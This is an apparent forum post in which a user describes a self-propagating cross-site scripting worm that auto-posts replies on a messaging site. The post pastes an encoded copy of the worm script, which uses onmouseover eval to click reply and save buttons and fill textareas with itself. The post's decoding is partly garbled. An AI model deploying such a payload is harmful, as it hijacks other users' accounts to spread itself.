They seem to have converted some javascript code into html escaped characters and got the browser to interpret it somehow. When I open my received messages it instantly tries to post a reply to every message on that page thus spreading itself.

Edit – there was a submission to programming earlier today (I think) that I can no longer find that had a similar if much less sophisticated attack. That one relied on people being stupid enough to copy and paste the code into the brower address bar. I suppose someone found an exploit and used his idea.

Decoding the script which is URL encoded gives us this;

[[code]]czo1Mjg6XCJbeF1bYl0NCltiXTovWw0Kej1cXFwiW3hdW2JdXFxcXG5bYl06L1tcXFwiK3RoaXMuaW5uZXJIVE1MK1xcXCJdKC9vbm1vdXNlb3ZlcntbJiomXX09ZXZhbCh1bmVzY2FwZSggICAgdGhpcy5pbm5lckhUTUwpKS8vKVxcXCI7DQpvPWRvY3VtZW50O2U9by5nZXRFbGVtZW50c0J5VGFnTmF7WyYqJl19bWUoXFxcJ2FcXFwnKTsNCmZvcihpPTA7aSZsdDtlLmxlbmd0aDtpKyspaWYgKGVbaV0uaW5uZXJIVE1MPT1cXFwncmVwbHlcXFwnKSQoZVtpXSkue1smKiZdfWNsaWNrKCk7DQpvPWRvY3VtZW50O2U9by5nZXRFbGVtZW50c0J5VGFnTmFtZShcXFwndGV4dGFyZWFcXFwnKTsNCmZvcihpPTA7aSZsdDtle1smKiZdfS5sZW5ndGg7aSsrKWVbaV0udmFsdWU9ejsNCmU9by5nZXRFbGVtZW50c0J5VGFnTmFtZShcXFwnYnV0dG9uXFxcJyk7DQpmb3IoaT0wO2kme1smKiZdfWx0O2UubGVuZ3RoO2krKykNCmlmIChlW2ldLmlubmVySFRNTD09XFxcJ3NhdmVcXFwnJmFtcDsmYW1wO2VbaV0uc3R5bGUuZGlzcGxheSE9e1smKiZdfVxcXCdub25lXFxcJykNCiQoZVtpXSkuY2xpY2soKTsNCl0oL29ubW91c2VvdmVyPWV2YWwodW5lc2NhcGUodGhpcy5pbm5lckhUTUwpKS8ve1smKiZdfSkNClwiO3tbJiomXX0=[[/code]]

Un-encoded it looks like;

[[code]]czo4OlwiW3hdW2JdDQpcIjt7WyYqJl19[[/code]]

Seems like the comment spam detector is removing the vast majority of it. Don’t be suprised if reddit goes down from this though.